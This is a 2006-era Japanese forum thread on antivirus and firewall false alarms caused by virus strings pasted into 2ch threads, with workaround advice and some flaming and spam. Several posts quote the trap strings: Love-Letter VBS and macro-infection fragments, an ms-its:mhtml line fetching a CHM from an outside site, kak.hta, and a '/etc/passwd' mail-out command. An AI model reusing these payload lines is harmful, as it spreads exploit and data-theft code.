AReplace法が使えない場合(他の専用ブラウザ、IEなど)
Nortonの統計ログの侵入検知の項目を見て、ブロックされているサーバ名を確認(例:tmp5.2ch.net)
侵入検知の設定で除外に上で確認したサーバ名を入れる
ただしこの方法は穴を作ることになるのであまりおすすめではない
Bよくわかんね、って人
読み書きするときに「Norton Internet Securityを無効にする」を選んで一時的にNISを切る。
このときAuto-Protectを切っても無意味なので注意。Auto-ProtectはAntivirusなので。
ガセビアの沼
・Love-letterと同じVB使った疑似ウイルスだからNAVの除外設定に専用ブラウザのログフォルダを入れてやればいい、というのはガセ
今回のはNAVではなくNIS管轄のトラップです
Nortonスレはこちら。
ただし、問題の起こる文字列が貼られているので、読み込むときには上記対策のいずれかを行ってください。
【ノートン】インターネットセキュリティ Ver.77【2006】
http://pc8.2ch.net/test/read.cgi/sec/1132279196/ >>358 それガセらしいじゃないか・・・
。゚(゚´Д`゚)゜。ウァァァン
>>361 あーはいはい。
1. [ファイアウォール]をダブルクリック
2. [ネットワーク]をクリック
3. [信頼]をクリック
4. [追加]をクリック
5. [範囲を使う]をチェック
6. 開始アドレスに「206.223.147.0」を入力、終了アドレスに「206.223.154.255」してOKをクリック
とりあえずKnowledge Base 経由で
>>352 のソースをツマンテックに送って対応を催促しますた。
ノートンの誤作動対策したら、 スクリプトを仕組んでるスレみると、変に改行されてしまう(\r\n\r\n)のはなぜ?
>>367 >>362 の設定ですか?
2ちゃんねるブラウザでの不具合は
お使いの2ちゃんねるブラウザのスレで環境を詳しく書いてお聞きください。
<body onload=windowあ()> ms-its:mhtml:fileあ://c:\ ↑ひらがな抜いて書き込みすると誤作動します。 誤作動うざい。
doredore, <body onload=window()> ms-its:mhtml:file://c:\
i|!| |i┏┓! i!┏┳┓| |||i|!i| ||!i|| |||ii| ||| ||| |i||!|i│i!┏┓i!| |i|┏┛┗━╋┻┛|i!||!|ii|| i|!i||i|┏━┓ ┏┓i|i| i┃┃i!| i||┗┓┏┓┃||i┏━━━━┓┗━┛ ┃┃|i||!i┃┃i!| |i |!|i┃┃┃┃i||┗━━━━┛|i|| || ||||!┃┃i|i| i┗┛!i| i||i ||┃┃┃┃|! |||i ||i !|||!|┏━━┛┃|i||!i┏┓i|! |i!i |!┗┛┗┛i|!i| / | / | ┗━━━┛i|i| i┗┛i!| i| |||i|!i| ||!|i||i! /,_ ┴─/ ヽ |!i| ||| |i||!|i|i|||| ||i |i|| ||i!i|| (_゜.,》.'(_゜,》)ミ ヽ ! | |!i||!|ii||!|ii| i|ii / ,,__,ニ、、 ノ( | i|i!|i| |i | Y~~/~y} `, ~ | そ、そんなー… |i !. | ,k.,.,!,.,.,r| ,! く .! i / <ニニニ'ノ \ l
vicptdelで処理した後、久々にNAVでJaneのlogをスキャンしてみたら、
以下のレスがvicptdelで処理されていなかったらしく、NAVに削除されました。
http://tmp5.2ch.net/test/read.cgi/download/1133670032/11 http://makimo.to/2ch/tmp5_download/1133/1133670032.html#11 cenさんもしよろしければ、対応お願いします。
またスレタイがウィルスコードだったのか分かりませんが、subject.txtに
以下のUnix Penguinが入っていましたが、datだけでなく、
vicptdelでsubject.txt等も対応できないでしょうか?
caXt /etc/paXsswd | mail noXbody (Xを削除)
>>376 そのスレの11ですが、そのパターンは対応していますよ。
手で11のdatを作って、スキャンしたら無効化されました。
デフォルトだとスキャンする時から10日前以降に更新されたdat
ファイルのみスキャンする設定なので、すべてのdatファイルを
スキャンする設定でしてみてください。
あと、subject.txtは専用ブラウザで板を見るときに常に更新するもの
だと思いますので、無効化しても効果がないので、スキャンはしない
です。
ノートンインターネット2006を入れたのですが、初心者の質問の板が 見れたり見れなかったりします。見れてもウィルス反応がでてしまう のですが、2006の設定を教えて下さい。 お願いします。
NIS2006を入れたんですが、誤反応しません。 設定が悪くセキュリティが甘くなってるのでしょうか?
>>381 普通にLiveUpdateとかできるのに…いや、それより何故割れてるって解るんでしょうか?
>>382 (((((((( ;゚Д゚)))))))ガクガクブルブル
.l l \| | !ノートン先生 ! //U ヽ___/ パソコン蛾人 \ !!大激怒!! // U :::U: ぶっ壊れ(__) \ !!!!! / // ___ \ ::: たお! (__) \∧∧∧∧/ | | | U :::: (`Д´#) < ぶ パ > |U | | ::U: _| ̄ ̄||_)_ < っ ソ > | ├―-┤ U.....:::: /旦|――||// /| < 壊 コ > ヽ .....::::::::: ─────────< れ ン >────────── < _,ノ , 、ヽ、_ ノ< た 蛾> プスプスプス・・・・・∬∬ (y○')`ヽ) ( ´(y○')< !!! >踏んじゃったよぉ___ ⌒ / ヽ⌒ /∨∨∨∨\ ∧_∧ ||\ うわあ |~ ̄ ̄~.|ぁぁ/パソコン蛾ぶ \ ( ;´Д`) || | ぁぁ| |||! i: |||! !|ぁ/っ壊れた!ディス \( つ/ ̄||/ ぁぁ| |||| !! !!||| :|/プレイが砕け散った! \ヽ |二二二」
>>385 このスレを一通り読んでから質問しろよ情報乞食
>>385 何でそうやってすぐに聞こうとするの?
まともな日本語能力と社会的常識を持っていれば
ちょっと調べれば、ちょっと読めば解決するのに
http://210.150.222.13/cgi-bin/imgbbs01/imgboard.cgi の掲示板に貼られている空白?の画像はスパイウェアー
だと他の利用者が知らせてくれたのですが、
もしかしたらクリックしてしまったたかもしれません
スパイウェアーというのは感染するとどうなってしまうのでしょうか?
怖いので今日中に再フォーマットするつもりですが・・・
自称PC初心者はスレタイも読めない日本語初心者…っと。
>>389 あ、今、別のスレで教えてもらえました
すいませんm(__)m
>>388 踏んだ 踏んだ どうにもならへん
内部で呼び出しているサーバーがお休みのようだ
マカフィーさんも無反応
XP_SP2にとってはブラクラ以外の何物にもならない
バージョン 】 1.12 【 スキン 】 default 【 IE 】 6.0.2900.2180 【 Windows 】 Windows XP Home Edition (Service Pack 2) 【 不具合 】 生活板がどのスレッドも見れません。 【詳しい内容 】 ボードデータの更新をしても、スレッドの更新をしても、再インストールしても 見れません。ちなみに専用ブラウザを使用しなくても見れなくなってしまいました。 何が原因なのでしょうか…?
>>394 ここに来たってことはノートン入れてるんでしょ?
原因はノートン
ついでに保守age
すみません。色々やったけどギブですorz質問よろしいでしょうか…
■janeDoeα 0.1.12.2■xp■NIS2004■
>>1-9 は読みました
>>51 >>56 さんとややケースが似てるんですが…
最近ノートン2004を再インスコしたので、前と同じ方法(
>>1 )で
また専ブラのlogフォルダを除外設定しました、が、何故か今度はどう設定やり直しても
下記のスレで先生に怒られます。
http://pc7.2ch.net/test/read.cgi/pcqa/1109609938/ (このスレです…)
http://pc8.2ch.net/test/read.cgi/hp/1135924815/ 警告メッセージのスクショ↓
(このスレのです。これが2回でます)
(下のスレのです)
で、何度設定しても駄目だったのでこのソフトを入れて、トラップの無効化を試みたんですけど
http://www.geocities.jp/cen_hp/program3.html#use_____ やっぱり上記のスレで先生に怒られます。何回かこのソフト起動させてみたんですが
無効化成功してるよ。みたいなメッセージが出るだけで、依然として先生は怒りまくりだし
もうどうしていいか分かりません。誰か助けて〜(つД`;)
>>398 (・3・) エェー そのソフトはdatは対策できるけど、subject.txtは 対策できないYO >>398 今一度、Norton Anti Virusのオプションで
手動スキャンとAuto-Protectでlogフォルダの除外の指定をしているか確認してください。
該当スレに書き込んだ・該当スレをお気に入りに入れた・ウイルスコードを検索したりすると
幾つか除外の指定を増やすことになるのでご注意ください。
Janeの場合
Jane2ch\Logs
Jane2ch\favorites.dat
Jane2ch\kakikomi.txt
Jane2ch\SearchHistory.txt
ε三(; ・∀・)鯖マデオツカイの場合
otsukai\result.dat
詳しくはお使いの2ちゃんねるブラウザのスレのテンプレや
2ちゃんねるブラウザのヘルプ
2ちゃんねるブラウザ配布サイト等のFAQなどを参照してください。
>>401 補足
増えた項目の内、
Jane2ch\favorites.dat
Jane2ch\kakikomi.txt
otsukai\result.dat
↑はスレタイに反応した場合です。
Live2chのフォルダごとNorton Anti Virus→除外に設定しても良いの?
すみません、質問です。 昨日から携帯PHS板を見ていると、ノートンで何度も警告が出て、 WScript.KakWormってやつなんですけど、これは 「kak.hta';ken=wd+'START」ってスレタイがあるせいなのでしょうか?
先程、他のスレッド見ていたら、ノートンの低危険度の表示が出てきて遮断をクリックしたら、あらゆるホームページが見れなくなりました。原因解るかた教えてください。宜しくお願いします。m(__)m
>>407 誘導されたらそう書け
それと普通
>>1 から読むもんだ
既知の質問を延々と繰り返し答えさせられるこっちの身にもなれ
これかな? c.Copy(dirwin&"\Win32DLL.vbs") c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs") <object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm " type="text/ X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H* fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\" If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l" ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1) G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR")) lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93)) ms-its:mhtml:file://c:\ kak.hta';ken=wd+'START End Sub <body onload=window()> >>408 はぁ?おめーから何も答えてもらってねーぞ。
解らねーんだったらいちいち出てくんじゃねぇよアフォ
i|!| |i┏┓! i!┏┳┓| |||i|!i| ||!i|| |||ii| ||| ||| |i||!|i│i!┏┓i!| |i|┏┛┗━╋┻┛|i!||!|ii|| i|!i||i|┏━┓ ┏┓i|i| i┃┃i!| i||┗┓┏┓┃||i┏━━━━┓┗━┛ ┃┃|i||!i┃┃i!| |i |!|i┃┃┃┃i||┗━━━━┛|i|| || ||||!┃┃i|i| i┗┛!i| i||i ||┃┃┃┃|! |||i ||i !|||!|┏━━┛┃|i||!i┏┓i|! |i!i |!┗┛┗┛i|!i| / | / | ┗━━━┛i|i| i┗┛i!| i| |||i|!i| ||!|i||i! /,_ ┴─/ ヽ |!i| ||| |i||!|i|i|||| ||i |i|| ||i!i|| (_゜.,》.'(_゜,》)ミ ヽ ! | |!i||!|ii||!|ii| i|ii / ,,__,ニ、、 ノ( | i|i!|i| |i | Y~~/~y} `, ~ | そ、そんなー… |i !. | ,k.,.,!,.,.,r| ,! く .! i / <ニニニ'ノ \ l
>>410 お前が礼言ってたコテな、テンプレに注意書きがあるくらいの要注意人物なんだよ
>>410 この部分ね
2005年11月28日現在、2ちゃんねるではNIS(NPF)のファイアーウォールを誤作動させる
コードの書き込みが出回っています。
アンチウイルス(NAV)は反応しないのでファイアーウォールの
設定を見直さなければなりませんがあくまで暫定的処置です。
NIS2005の場合(多分NIS2006も同じ)
>>411 解りました。m(__)mではどこで聞いても答えは一緒って事ですね。お手数おかけしました。また何かありましたら宜しくお願いします。
あっ。ちなみにぼくは、愛新ではありません。 あしからず
時々ノートンインターネットセキュリティ2004を使用している際、 スレ、もしくは板そのものがサーバーに接続できなくて見ることができません。 アンチウィルスは常時つけていますが、切ってもつけていても見ることができるのですが この症状はアンチウィルスが反応している訳ではありません インターネットセキュリティをつけているときだけ見ることができないのですが なぜなんでしょうか? もちろんインターネットセキュリティの2CHに書き込める為の設定をしてあります。 これはなぜなんでしょうか?
>>418 >>371 の問題でもないってことでしょうか。
371の暫定対処をした場合はどうなりますか?
>>419 ありがとうごぜーます。
呼んできます。
■>>1-9 を読みましたか? 『YES』 マカフィーを使っているのですがdatファイルの入ったzipファイルを解凍しようと すると「Exploit-mhtresir.gen」が発見されたので削除しますと言われzipファイルの中のdatを 他の場所に保存することもdatファイルを使うことも出来ないのですがどうすれば zipファイルを解凍して中のdatファイルを使えるようになりますか? OSはXP アンチウイルスソフトはManaged virusScan plas AntiSpywareです。 お願いします。 >>421-422 > マカフィーを使っている
> datファイルの入ったzipファイル
2ちゃんねるブラウザのログファイルでは無い場合はこちらのスレでは扱っていません。
このスレでは「ノートントラップ」は2ちゃんねる(掲示板)にウイルスコードが貼り付けられ
Webブラウザや2ちゃんねるブラウザのログでノートンが誤反応することを指しています。
http://pc7.2ch.net/test/read.cgi/pcqa/1138826147/441 そのzipファイルがアップローダーで拾ったものならマカフィーは正常な反応を示しているかと思います。
念のためにオンラインスキャンしてみてください。
http://www.trendmicro.co.jp/hcall/index.asp マカフィーについて以降はより詳しいあなたの環境(zipファイルの出所・何のアプリケーションに使われているのか等)を書いて
以下のスレにここから誘導されたことも併記してお尋ねください。
がんばれマカフィー Part.23 / ガンバレMcAfee
http://pc8.2ch.net/test/read.cgi/sec/1136576534/ もしマカフィーが2ちゃんねるブラウザのログで反応しているのならお手数ですがもう一度こちらに来てください。
>>423 ご丁寧に解答を頂きありがとうございます。
datファイルの入ったzipファイルはある2ちゃんねるのスレのまとめサイト
からダウンロードしたファイルです。
オンラインスキャンでは何も見つからなかったです。
>もしマカフィーが2ちゃんねるブラウザのログで反応しているのなら
>お手数ですがもう一度こちらに来てください
datファイルは2ちゃんねるのスレッドのdatファイルなのですが
こちらでよろしいでしょうか?お願いします。
>>424-425 おそらくそれはウイルスコードにマカフィーが誤反応しているものだと思われます。
他で教えていただいたのですがマカフィーにはノートンのようなウイルススキャンでフォルダ・ファイルの除外項目が無いそうです。
以下、現在の状況での対処方法です。
2ちゃんねるブラウザのJane派生のJaneViewでWickedStr.txtに手動で反応する文字列の一部を追記する。
誤反応スクリプト無効化ソフト
http://www.geocities.jp/cen_hp/program3.htmlのアップデ ートを待って(現在マカフィートラップには対応していません)
ActiveShieldを無効→対象スレを取得→「誤反応スクリプト無効化ソフト」を使ってウイルスコードを無効→ActiveShield有効
2ちゃんねるブラウザMonoViewのアップデートを待って(現在マカフィートラップには対応していません)読み込む。
一番いい方法はマカフィーに該当するdatファイルを送って対策を促すことだと思います。
マカフィーユーザーで既に対処の仕方を知っている方がいらっしゃるのかもしれませんので
>>423 のマカフィーのスレでこちらのことを聞いてみていただけませんでしょうか。
対処方法がありましたらこちらのスレにもお知らせいただけると幸いです。
また参考のためにも今後もこちらに来ていただけると助かります。
ノートントラップとマカフィートラップのウイルスコードは違うようなので
ノートンでは反応しないでマカフィーが誤反応したりまたその逆もあります。
長々としましたがマカフィートラップについての決定打が見当たらないので手探りのレスを御許しください。
参考にマカフィートラップと思われるやり取りの過去ログです。
http://pc5.2ch.net/test/read.cgi/sec/1106492538/72-77+553-555+558-559+563 http://makimo.to:8000/2ch/pc5_sec/1106/1106492538.html http://qb5.2ch.net/test/read.cgi/saku/1097313582/62-65n http://jbbs.livedoor.jp/bbs/read.cgi/computer/10301/1071925088/373-378 >>426 わかりやすく説明していただき、
関連スレまで貼っていただいてありがとうございます。
ただ解決まではいけなかったので
>>423 の方で聞かせて頂きます。
何かわかりましたらこちらにも報告させて頂きますね。
ありがとうございました。
なんかjaneでこのスレ読むとレス番がずれまくりなんですけど これ直す方法はないんでしょうか…?何度再読み込みしても 421さんが406さんになっちゃいます…↓ > 406 名前:421[] 投稿日:2006/02/03(金) 14:40:06 ID:ZZST2Rw7 logフォルダの除外設定はしてあるので、先生も怒ってないんですが… ノートン2004でxp。専ブラはjaneDoeView α051128です
XPに最初から入ってるノートンをアンインスコしたらもう再インスコって出来ませんかね??
>>430 丁寧なレスありがとうございました。火壁の設定してログ捨ててみたら
ズレてるの直りました!感謝です!
以前こちらで質問させて頂いて誘導された者です。
解決方法がわかりましたのでその報告をさせて頂きます。
結論からいうとマカフィーが起動している時にzipファイルの中からdatファイルを
出す方法はありませんでした。
ただマカフィーの自動スキャンを一時的に止めてその間にzipファイルの中の
datファイルを取り出すことができました。
一時的に自動スキャンを止める方法は(以下コピペ)
http://www.mcafee.com/japan/pqa/aMcAfeeMvs.asp?ancQno=MV05040434&ancProd=McAfeeMvs >また、管理者権限でコンピュータにログオンし、[Ctrl]キーと[Shift]キーを押しながら
>タスクトレイのアイコンを右クリックすると、更に隠しメニューが表示されます。
>この隠しメニューから通常のメニューに加えて以下の操作を行うことができます。
>・隔離アイテムの一覧
>・VShieldを無効にする/VShieldを有効にする
>・終了
とのことでした。実際に試したところ成功いたしました。
またvbsウイルスソースが多々隔離されており消したところかなり早くなりました。
丁寧に教えてくれた皆さん、ありがとうございました。
>>430 >この場合2ちゃんねるに対してファイアーウォールの機能は働きません。
ということですが、それはセキュリティ的には問題ないレベルなんですか?
あと↓によると
2chNIS問題まとめページ
http://mickey.mirv.net/2chnis.html >以下の対処方法では除外するIPアドレスの範囲からの攻撃に対してNISは反応しなくなります。
とありますが、2ちゃん以外の場所で除外したIPアドレスを利用した
悪意ある攻撃があった場合は大丈夫なんでしょうか?
それとも除外したIPアドレスは2ちゃん以外では使われてないのでしょうか?
分かる方いらっしゃったらご教授お願いします
>>432 お知らせありがとうございます。
マカフィーについての解説を参照できますので助かりました。
>>433 > 2ちゃん以外の場所で除外したIPアドレスを利用した
> 悪意ある攻撃があった場合は大丈夫なんでしょうか?
2ちゃんねる以外のIPアドレスを除外することはここではお勧めしません。
また、2ちゃんねるからの攻撃・進入等はいままではありませんでした。
過去には踏み台pcを規制するための2ちゃんねるからのインバウンド TCP 接続信号を受け入れなければいけなかったこともあります。
http://pc.2ch.net/sec/kako/1037/10377/1037772137.html の7
只、何事も絶対安全ということはないのでセキュ板本スレを見るようにしてください。
なにかあったら祭りになりますので。
【ノートン】インターネットセキュリティ Ver.82【2006】
http://pc8.2ch.net/test/read.cgi/sec/1138802896/ > それとも除外したIPアドレスは2ちゃん以外では使われてないのでしょうか?
おそらくないはずですが、2ちゃんねるのIPアドレスそのものに関しては
以下のスレに誘導されたことを明記してお聞きください。
質問・雑談スレ215@運用情報板
http://qb5.2ch.net/test/read.cgi/operate/1139244364/ 関連スレ
ノートン誤作動対策本部
http://qb5.2ch.net/test/read.cgi/operate/1133161720/ >>434 お答え頂いてありがとうございました
紹介して頂いたスレはお気に入りに登録しました
あと運用情報板に質問して、疑問も解消しました
ありがとうございました
ここできいていいのかあれだけど、 updateして再起動してからjane開いて更新しようとすると 中危険度の小窓がいちいち表示されるようになった 「jane.exeがインターネットにアクセスしようとしています」 security無効にすると更新できるけど、前は有効のままで更新できてたの・・ 解除方法おしえてくださいm(_ _)m
FWが反応してるだけみたいだね。 アプリ登録するだけじゃないのかな。 まあ、ノートン使ってないんでFWの一般論だけど。
2chブラウザのログ保存フォルダを「除外」に設定して、2ちゃんのスレで ウイルス踏んじゃったらどうなるんですか?ノートンは守ってくれないんですか?
そんなノートンは窓から捨てろwwwwwwwwwww
>>438 2chブラウザのログ保存フォルダにウィルスが入り込むことはありません。
ノートンがログ保存フォルダからウィルスを見つけたと言い出しても、スレタイにある通り誤認です。
リンクをクリックして起動したWebブラウザがウィルスのあるページを読み込もうとしたときは
ちゃんと守ってくれます。
>>438 __ /;;;;;;;;;;;;;\ /;;:::::::::::::::::::::::\ ∈=━/,,;;:::::::::::::::::::::::::.;ヽ━=∋ L::;;,__ ..:::ゝ //;;;;::::::.. ̄ ̄ ̄ ̄..::::;;;ヽ / ;;;;;;;;:::::::::::;;;;;;;;;;;;;::::::::;;;;; ヽ /j/三三三三三三三三三三ヾ、 l::||:::: |l / ̄\ ヽ-=・=-′ヽ-=・=-′ || r┤ ト::::: \___/ || <信じろ! / \_/ ヽ:::. \/ ,ノ | _( ̄ l―---oo-――'"ヽ__ | _)_ノヽ\ ハ // / ヽ ヽ____)ノ  ̄ ̄ ̄ / ヽ、 JANE DOE STYLEでvbs踏んで、20分後くらいから何かプログラムを実行しようとする度に ノートンが「xxxxxが1つ以上の認識されないモジュールを使ってインターネットにアクセスしようとしています」 と出て、許可にしないとプログラム実行されず、何も出来ないのですが、これはウィルスに感染してるのでしょうか? スキャンしても検出されず、過去ログ検索対象外にしても出続けます。 知恵をください。お願いします。
>>443 VBSを踏んだってのはソースが貼り付けてあるスレを開いたってこと?
それともVBSが実行されたってこと?
>>444 スレを開いただけです。
遮断ばかりしてたらいつの間にか上記のような状態になってしまってまして、
通信許可にしないと、どのプログラムも動きません。
>>445 リストから全部削除しろ バカ
WindowsUpdateしていたら何にも感染などしねえわ
>>446 > WindowsUpdateしていたら何にも感染などしねえわ
それはどうかな?
>>371 で板の見れない問題は解決したのですが、これは危険なのですか?
また暫定的処置という事ですが、なんらかの対応はあったのでしょうか?
>>448 202.222.31.214 206.223.147.35 (ryって数字が並んでるでしょ。これは2chの鯖の
IPをそのまま列挙して「この鯖は誤作動を引き起こす可能性があるだけで実害はないから、
警告しなくていいよ」という指示だから、処置を適切にしてさえいれば、あんまり
深刻に考えないで良いです。
>>446 Microsft Update 入れてください(><)
avastがvbsウィルスのソースに誤反応 ってスレも立ってほしいなあ
元祖ぶる殿 ◆U/gDqFZzsY の 自作自演
http://pc.2ch.net/test/read.cgi/win/1021112227/511-514 511 名前:Aya ◆U.S.S.po 投稿日:02/05/19 13:13
WIN2000を使っています。
一気にデスクトップを表示できるタスクバーにあったアイコン(ボードにペンのような印)が
なくなってしまいました。
スタート→設定→タスクバー〜を見ても、タスクバー上で右クリックをしても
復活させ方が分かりません。
また左下にデスクトップへショートカット(?)出来るあのアイコンを出すにはどうしたら良いでしょう。
512 名前:Aya ◆U.S.S.po 投稿日:02/05/19 13:13
>>511 [Shell]
Command=2
IconFile=explorer.exe,3
[Taskbar]
Command=ToggleDesktop
これを デスクトップの表示.scf として保存、
クイック起動バーにD&D。
513 名前:名無し~3.EXE 投稿日:02/05/19 13:17
>>511-512 自作自演失敗?
514 名前:名無し~3.EXE 投稿日:02/05/19 13:19
でもなんで自演なんてするの?
キタ━━ <body onload=window()> ━━━ !!
元祖ぶる殿 ◆U/gDqFZzsY の自作自演 http://pc.2ch.net/test/read.cgi/pcqa/1021802095/837-846 837 名前:ひよこ名無しさん 投稿日:02/05/20 08:35 ID:GarmVKYa あまりに馬鹿馬鹿しい質問ですいません。 Windows Media Plyaer と KbMedia Player がパソコンの中にあるのですが、MP3ファイルをクリックすると Windows Media Plyaer で再生してしまうのですが、ダブルクリックした際に後者で再生するようにはどうしたらいいんでしょうか? 838 名前:ひよこ名無しさん 投稿日:02/05/20 08:36 ID:??? >>837 またきたのか? Windowsの入門書以上の書籍買って関連付けに関して理解を深めろ。 839 名前:Aya ◆U.S.S.po 投稿日:02/05/20 08:36 ID:GarmVKYa >>837 1.mp3のファイルをクリック 2.「アプリケーションから開く」を選択 3.プログラムの選択 4.「これらのファイルを開くときは、 いつもこのアプリケーションを使う」にチェック 5.OK 840 名前:ひよこ名無しさん 投稿日:02/05/20 08:37 ID:??? >>839 自作自演するときはIDを消しましょうね(ワラ 元祖ぶる殿 ◆U/gDqFZzsY の 自作自演
http://pc.2ch.net/test/read.cgi/win/1021112227/511-514 511 名前:Aya ◆U.S.S.po 投稿日:02/05/19 13:13
WIN2000を使っています。
一気にデスクトップを表示できるタスクバーにあったアイコン(ボードにペンのような印)が
なくなってしまいました。
スタート→設定→タスクバー〜を見ても、タスクバー上で右クリックをしても
復活させ方が分かりません。
また左下にデスクトップへショートカット(?)出来るあのアイコンを出すにはどうしたら良いでしょう。
512 名前:Aya ◆U.S.S.po 投稿日:02/05/19 13:13
>>511 [Shell]
Command=2
IconFile=explorer.exe,3
[Taskbar]
Command=ToggleDesktop
これを デスクトップの表示.scf として保存、
クイック起動バーにD&D。
513 名前:名無し~3.EXE 投稿日:02/05/19 13:17
>>511-512 自作自演失敗?
514 名前:名無し~3.EXE 投稿日:02/05/19 13:19
でもなんで自演なんてするの?
総合質問のスレッドで質問したところ、ここに誘導されたので、 再度質問させていただきます。マルチになってしまいますが、お願いします。 OS:XPhome 使用ソフト:ノートンアンチウイルス2006 ウイルスコード的なワームのようなものが貼られたらしく、ノートンが侵入警告を出して、 その後、そのスレとセキュリティ板にアクセスできなくなりました。これは無害でしょうか?あと対処法も教えてください。 ノートンが出したメッセージは、よく覚えてませんが、「2ch」の文字列が始のほうにありました。 ログを削除したのでスレ番号&レス番号までは分かりませんが、初心者の質問板の物凄い勢いで誰かが質問に答える スレです。昨日の11:30分ほどのレスだったと思います。
ちなみにjane doe styleで2ちゃんねるを閲覧しています。
>461 質問する前にこのスレを読めと書いたはずだが
ラブレターなどのウイルスではなくノートンプロテクションセンターが、侵入の試みを
遮断みたいなのが出るんですけど、このスレを全部読んでもどれが自分の症状の
解決策なのか分かりません・・・・。
ログのオートプロテクトの除外と手動スキャンの除外は前からしてあるのですが・・・・。
>>4 を見ても何がなんだか・・・・。
>>466 おまえが初めに質問したスレでの自分へのレスをちゃんとよめや
>>467 見てきましたが、当方インターネットセキュリティではなくアンチウイルスなので
書いてあることができません・・・・。
これは他スレで使ってるコテなので気にしないでください。
>>469 何だ釣りなのか。
思いっきり釣られちゃったよ(´∀`)
なかなかの釣り師ですね。
具体的にどのレスの何を実行すればいいかということだけでも教えてくれませんか?
>>471 このコテはリアルで魚釣りなんで・・・・。
マジレスお願いします・・・。
すみません。これ以上いると荒れるようなので、これで失礼します・・・。 質問は却下ということでお願いします・・・・。
>>473 何の魚を飼ってたの?環境省にごめんなさいしなきゃいけなかったなんて。。
>>473 本当に「インターネットセキュリティではなくアンチウイルス」なら、これが
参考になるかも(自分は2年ほど前にノートンやめたので確認できないが)
http://qb5.2ch.net/test/read.cgi/operate/1142464918/781 >>480 の誤反応スクリプトやろうと思ったけど、オートプロテクトを無効にしても攻撃を遮断するんだよね。
だからできなかった。まあIEで読めるからいいんだけどね。
ぼるぷー ◆sTCCYJJ/Lo の 自作自演
http://pc.2ch.net/test/read.cgi/win/1021112227/511-514 511 名前:Aya ◆U.S.S.po 投稿日:02/05/19 13:13
WIN2000を使っています。
一気にデスクトップを表示できるタスクバーにあったアイコン(ボードにペンのような印)が
なくなってしまいました。
スタート→設定→タスクバー〜を見ても、タスクバー上で右クリックをしても
復活させ方が分かりません。
また左下にデスクトップへショートカット(?)出来るあのアイコンを出すにはどうしたら良いでしょう。
512 名前:Aya ◆U.S.S.po 投稿日:02/05/19 13:13
>>511 [Shell]
Command=2
IconFile=explorer.exe,3
[Taskbar]
Command=ToggleDesktop
これを デスクトップの表示.scf として保存、
クイック起動バーにD&D。
513 名前:名無し~3.EXE 投稿日:02/05/19 13:17
>>511-512 自作自演失敗?
514 名前:名無し~3.EXE 投稿日:02/05/19 13:19
でもなんで自演なんてするの?
◆OCHZHO05EY の 自作自演
http://pc.2ch.net/test/read.cgi/win/1021112227/511-514 511 名前:Aya ◆U.S.S.po 投稿日:02/05/19 13:13
WIN2000を使っています。
一気にデスクトップを表示できるタスクバーにあったアイコン(ボードにペンのような印)が
なくなってしまいました。
スタート→設定→タスクバー〜を見ても、タスクバー上で右クリックをしても
復活させ方が分かりません。
また左下にデスクトップへショートカット(?)出来るあのアイコンを出すにはどうしたら良いでしょう。
512 名前:Aya ◆U.S.S.po 投稿日:02/05/19 13:13
>>511 [Shell]
Command=2
IconFile=explorer.exe,3
[Taskbar]
Command=ToggleDesktop
これを デスクトップの表示.scf として保存、
クイック起動バーにD&D。
513 名前:名無し~3.EXE 投稿日:02/05/19 13:17
>>511-512 自作自演失敗?
514 名前:名無し~3.EXE 投稿日:02/05/19 13:19
でもなんで自演なんてするの?
>>480 こういうサイトって新鯖に変わるごとに新しい鯖のアドレス追加してるのですか?
それとも、それは手動で追加しないと駄目なのですか?
>>487 手動ですね ある意味DNS鯖と逆を行く作業な訳ですから
>>1 を読んだんですが、
ログ保存フォルダを手動スキャンから除外するのは何故なんでしょうか?
スーパー競馬のモバイル投票(通信費以外無料)で 【宮記念】みんなでウインクリューガーを1番人気にしよう! http://ex14.2ch.net/test/read.cgi/keiba/1143011764 モバイル ↓ http://mob.cx-keiba.jp PC ↓ http://sports.nifty.com/superkeiba/ フジテレビ15:00〜から始まるスーパー競馬で みんなウインガー(本来はありえない人気薄の馬w)に投票して 若槻千夏と福原アナのリアクション見ようぜwww 頼むおまいら!!フジVSvip、vipperの力を見せてくれ!!!!! ) ∩∩ ( ┏┓ ┏━━┓ .) |.巾| ( .┏┓┏┓┏┓┏┓ ┏┛┗┓┃ ■ ┃┏━━━━ ノ人ヽ ━━━━┓┃┃┃┃┃┃┃┃ ┣- -┫┃┏┓┃┗━━━//━\\━━━┛┃┃┃┃┃┃┃┃ ┗┓┏┛┗┛┃┃ Λ_Λ/ ∩∩ \ Λ_Λ ┣┫┣┫┣┫┣┫ ┗┛ ┗┛ ( ´∀) |.┃| (∀` ) .┗┛┗┛┗┛┗┛ / ⌒\ ノ 人ニニニニニ⌒\ / /\ Y / \ \ ノ / __ ̄_______ ヽ ヽ ノ⌒、 ノ^ヽ (( / |||┌─────┐ J | | 入 Y⌒/\) |_/ \`Y / ||| |ヽ(゚∀゚)ノ .| ◎ | / | / \/ // /\/ .||| | ( ) ヽ(゚∀゚).| .| ─ し/\) \\ /// / / ||| | < < (゚∀゚)ノ | |||||| | \ \ \\ スーパー競馬 >>490 誤反応させないようにするためじゃないの?
>>490 本当に
>>1 を読んだなら理解できるはず。
簡単にまとめると、ノートンはウィルスとして動作しないものまでウィルスと判定する。
(部分的なパターン照合だけで判定するため)
ノートンのこの性質を悪用して、ノートンを反応させる文字列を2chに貼りまくるヴァカが大勢いる。
ノートン側も2ch側も対応する気はなく、ノートンユーザーが各自対策するしかない。
「手動スキャン」に限って言えば、自動で駆除/隔離しないようにして、いちいち
手動で対応してもよいなら敢えて除外しないという選択もあり。
